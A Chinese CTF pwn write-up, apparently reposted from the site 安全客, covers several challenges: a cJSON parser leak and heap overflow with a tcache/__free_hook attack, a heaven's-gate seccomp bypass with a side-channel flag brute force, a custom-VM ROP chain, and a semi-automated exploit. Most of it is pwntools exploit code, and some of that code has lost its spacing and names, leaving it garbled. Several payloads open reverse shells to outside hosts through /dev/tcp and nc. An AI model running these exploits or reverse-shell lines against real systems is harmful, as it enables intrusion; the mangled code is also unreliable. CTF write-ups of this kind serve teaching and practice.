用”\或者/都可以跳过2个\x00，但是每次用”\会拷贝4个字节到buf中，导致最后的3字节数据无法泄露，所以用/\配合垃圾数据填充来控制泄露字符串。

exp:

coding:utf-8frompwnimport*importsubprocess,sys,osfromtimeimportsleepsa=lambdax,y:(x,y)sla=lambdax,y:(x,y)elf_path='./cJSON_PWN'ip='124.70.202.226'port=2101remote_libc_path='/lib/x86_64-linux-gnu/'LIBC_VERSION=''HAS_LD=FalseHAS_DEBUG=Falsecontext(os='linux',arch='amd64')_level='debug'defrun(local=1):LD_LIBRARY_PATH='./lib/'LD=LD_LIBRARY_PATH+''globalelfglobalpiflocal==1:elf=ELF(elf_path,checksec=False)ifLIBC_VERSION:ifHAS_LD:p=process([LD,elf_path],env={"LD_LIBRARY_PATH":LD_LIBRARY_PATH})else:p=process(elf_path,env={"LD_LIBRARY_PATH":LD_LIBRARY_PATH})else:p=process(elf_path)else:p=remote(ip,port)run(0)payload=''*0xc+'"\\'(payload)payload='a'*8+''*4+'"\\'(payload)part1=(11)payload='a'*5+''*7+'/*'(payload)payload=''*12+'/*'(payload)part2=(11)complete=part1+part2sa('data',complete)()

有栈溢出，但是只能使用调用号为0，5，37的系统调用，5是32位下的open，所以利用思路是先heaven’sgate切换到32位来openflag，再回到64位readflag，最后找一个gadget用来侧信道获取flag。

主要难点在于找gadget，有4个比较重要的gadget。首先是0x40A756用于设置rdx，但需要zf位为1才能正常执行，因此用0x40106D来设置zf。然后是0x40172A用来栈迁移，最后用0x408F72侧信道方式拿到flag。

exp:

frompwnimport*read_addr=0x401170retfq=0x4011ECint80=0x4011F3syscall=0x408865flag=0x40D480pop_rax=0x401001pop_rbp=0x401102pop_rbx_24=0x403072pop_rcx=0x4092D0pop_rdi_8=0x401734pop_rsi_16=0x401732pop_rdx_48=0x40A756flag_addr=0x40D260lea_rsp=0x40172Aset2z=0x40106Dcmpa=0x408F72loop=0x40A765bit32=p64(0x23)bit64=p32(0x33)fmap=[ord('_')]fmap+=[iforiinrange(ord('a'),ord('z')+1)]fmap+=[iforiinrange(ord('0'),ord('9')+1)]fmap+=[iforiinrange(ord('A'),ord('Z')+1)]fmap+=[0,ord('@'),ord('-'),ord('{'),ord('}'),ord('?'),ord('!')]f=''c=len(f)if_ok=Falsewhile(notif_ok):caddr=flag+csign=0forguessinfmap:print(hex(len(payload)))((0xc0,'a'))payload2="flag\x00\x00\x00\x00"payload2+=p64(retfq)+p64(pop_rbx_24)+bit32+p32(flag_addr)+p32(0)*3+p32(pop_rcx)+p32(0)+p32(pop_rax)+p32(5)+p32(int80)payload2+=p32(retfq)+p32(pop_rdi_8)+bit64payload2+=p64(flag_addr+len(payload2)+24)+p64(0)+p64(read_addr)print(hex(len(payload3)))((0xc0,'\x00'))payload4='\x00'*0xf+p64(0)(payload4)try:('ok')(timeout=0.5)if(notguess):if_ok=Truesign=1breakf+=chr(guess)print(f)()sign=1breakexcept:()if(notsign):f+='print(res)if(res[-6:-1]!="abcde"):flag=flag[:-1]()else:()print(flag)if(x=='}'):if_ok=Truebreak

远程爆破出sleep的偏移为0xed850，但搜不到对应的libc，最后才发现版本为2.34。根据sleep算出system，poprdi和environ的值，用他们来定义变量，再定义一个存储vm_call_lambda返回时rsp的变量stack。然后调用一个不存在的函数，其返回值为一个堆上的地址，调试得到它与之前定义的变量地址的偏移。然后将environ上的栈地址拷贝到stack处，再根据偏移得到vm_call_lambda返回时的rsp。最后把各变量值用memcpy拷贝到rsp处构造出rop链。

code:

code="""giftlibcbaseissleep-972880;giftenvironislibcbase+2232000;giftstackissleep-16;giftlenis8;giftcmdis"bash-c'/home/ctf/getflag/dev/tcp/ip/7777'";giftcmdaddriscmd+1;reindeerhahadeliveringgiftlenlenlenbringsbackgiftaddr;giftstackaddrisaddr+5848;reindeerVixeliveringgiftstackaddrenvironlen;giftstackisstack-1184;giftpoprdiislibcbase+190149;giftsystemislibcbase+346848;giftretispoprdi+1;giftcmdaddraddrisaddr+6104;giftsystemaddrisaddr+6488;giftpoprdiaddrisaddr+6456;giftretaddrisaddr+6520;reindeerVixeliveringgiftstackretaddrlen;giftstackaisstack+8;reindeerVixeliveringgiftstackapoprdiaddrlen;giftstackaisstacka+8;reindeerVixeliveringgiftstackacmdaddraddrlen;giftstackaisstacka+8;reindeerVixeliveringgiftstackasystemaddrlen;giftstackaisstacka+8;"""

\"字符截断parserstring堆长度统计逻辑，然后之后可以拷贝很长的字符串，造成堆溢出，键同名free，tcacheattack

exp：

coding:utf-8frompwnimport*importsubprocess,sys,osfromtimeimportsleepdefchose(idx):sla('Chose',str(idx))defadd(name='',value=''):globalpayloadpayload+='"{}":"{}",'.format(name,value)defpackage(content):iflen(content)1:print('eeee')ans=''foriinrange(len(content)/2):ans+='\\u'+content[i*2:i*2+2].encode('hex')returnanslibc_addr=0x7fd19f744000loadlibc()=libc_addrshell='ncip7777|/bin/bash|ncip9999'globalpayloadpayload=''add('a'*0x18+str(i),'a'*0x20)add('a'*0x18+'a1','a'*0x20)add('a'*0x18+'a2','a'*0x20)add('a'*0x18+'a3','a'*0x20)add('a'*0x18+'a4','a'*0x20)add('a5',shell)add('a'*0x18+'a1','b'*0x10)add('a'*0x18+'a3','b'*0x10)add('a'*0x20+'\\"'+'a'*0x6+package(p64(0x31))+package(p64(['__free_hook'])),'a'*0x20)add(package(p64(['system'])),'a'*0x10)add('a5','aa')payload='{'+payload+'}'print(payload)withopen('payload','w')asf:(payload)

payload：

{"aaaaaaaaaaaaaaaaaaaaaaaaa1":"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa","aaaaaaaaaaaaaaaaaaaaaaaaa2":"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa","aaaaaaaaaaaaaaaaaaaaaaaaa3":"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa","aaaaaaaaaaaaaaaaaaaaaaaaa4":"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa","a5":"bash-c'/This_is_your_gift/dev/tcp/49.232.202.102/7777'","aaaaaaaaaaaaaaaaaaaaaaaaa1":"bbbbbbbbbbbbbbbb","aaaaaaaaaaaaaaaaaaaaaaaaa3":"bbbbbbbbbbbbbbbb","aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\"aaaaaa\u3100\u0000\u0000\u0000\u705e\u909f\ud17f\u0000":"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa","\u50ce\u789f\ud17f\u0000":"aaaaaaaaaaaaaaaa","a5":"aa",}

自动化写不出，半自动跑，先下载文件，然后151行pause前手动分析完对应参数

exp：

coding:utf-8frompwnimport*importsubprocess,sys,osfromtimeimportsleepfromhashlibimportsha256importbase64sa=lambdax,y:(x,y)sla=lambdax,y:(x,y)elf_path='./'ip='123.60.82.85'port=1447remote_libc_path='/lib/x86_64-linux-gnu/'LIBC_VERSION=''HAS_LD=FalseHAS_DEBUG=Falsecontext(os='linux',arch='amd64')_level='debug'defrun(local=1):LD_LIBRARY_PATH='./lib/'LD=LD_LIBRARY_PATH+''globalelfglobalpiflocal==1:elf=ELF(elf_path,checksec=False)ifLIBC_VERSION:ifHAS_LD:p=process([LD,elf_path],env={"LD_LIBRARY_PATH":LD_LIBRARY_PATH})else:p=process(elf_path,env={"LD_LIBRARY_PATH":LD_LIBRARY_PATH})else:p=process(elf_path)else:p=remote(ip,port)defdebug(cmdstr=''):ifHAS_DEBUGandLIBC_VERSION:DEBUG_PATH='/opt/patchelf/libc-'+LIBC_VERSION+'/x64/usr/lib/debug/lib/x86_64-linux-gnu/'cmd='source/opt/patchelf/\n'cmd+='loadsym'+DEBUG_PATH+'libc-'+LIBC_VERSION+'.so\n'cmdstr=cmd+(p,cmdstr)pause()defloadlibc(filename=remote_libc_path):globallibclibc=ELF(filename,checksec=False)defone_gadget(filename=remote_libc_path):returnmap(int,_output(['one_gadget','--raw',filename]).split(''))defstr2int(s,info='',offset=0):iftype(s)==int:s=(s)ret=u64((8,'\x00'))-offsetsuccess('%s==0x%x'%(info,ret))returnretdefchose(idx):sla('Chose',str(idx))defadd(idx,size,content='\n'):chose(1)sla('Index',str(idx))sla('Size',str(size))sa('Content',content)defedit(idx,content):chose(2)sla('Index',str(idx))sa('Content',content)deffree(idx):chose(3)sla('Index',str(idx))defshow(idx):chose(4)sla('Index',str(idx))defhash_digit(af,hash_hex):print(af,hash_hex)ch='0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'foriinch:forjinch:forkinch:forhinch:ifsha256(i+j+k+h+af).hexdigest()==hash_hex:returni+j+k+hdefget_file(filename):('sha256(xxxx+')hash=(')')[:-1]('==')hash_hex=('\n')[:-2]ans=hash_digit(hash,hash_hex)print(ans)sla('givemexxxx:\n',ans)base64_e=('====\n')[:-8]withopen(filename,'wb')asf:globalelfelf=(base64_e)(elf)defanalysis(begin_addr):begin_addr+=0x18ranks=[]defu32(content):returnint(content[::-1].encode('hex'),16)definsert(vec):fori,vinenumerate(ranks):ifvec[0]v[0]:(i,vec)(vec)defget_a_string(addr):ans=''whileelf[addr]!='\0':ans+=elf[addr]addr+=1returnansaddr=begin_addrn=ord(elf[addr+1])addr+=13foriinrange(n):rk=u32(elf[addr+3:addr+7])va=u32(elf[addr+9])ifva==0x88:ifelf[addr+7:addr+9]=='\xf7\xd0':va=0xffaddr-=1ifva==0x2b:ifelf[addr+7:addr+9]=='\x88\x85':va=0addr-=3foriinranks:print(hex(string_addr))string=get_a_string(string_addr)#print(string)ans=''fori,vinenumerate(ranks):ans+=chr(ord(string[i])^v[1])returnansrun(0)get_file('')pause()importdatasdata=('\n')[-2::-1]fori,vinenumerate(data):tmp=('')iflen(tmp)==1orlen(tmp)==2:iftmp[0]=='EOF':data[i]='a'*int(tmp[1],16)else:data[i]=analysis(int(tmp[0],16))else:data[i]=['0']*int(tmp[0])data[i][int(tmp[1])]=tmp[2]print(data)foriindata:iftype(i)==str:sa(':',i)else:(':')forjini:(j+'')backdoor=p64(0x401354)*10payload='a'*+(payload)sleep(0.1)('catflag')()

分析结果填入

data='''8031292dde6DA3E800C926600EOF24'''offset=0x0

然后跑就出了

本文由DawnAA原创发布
转载，请参考转载声明，注明出处：
安全客-有思想的安全新媒体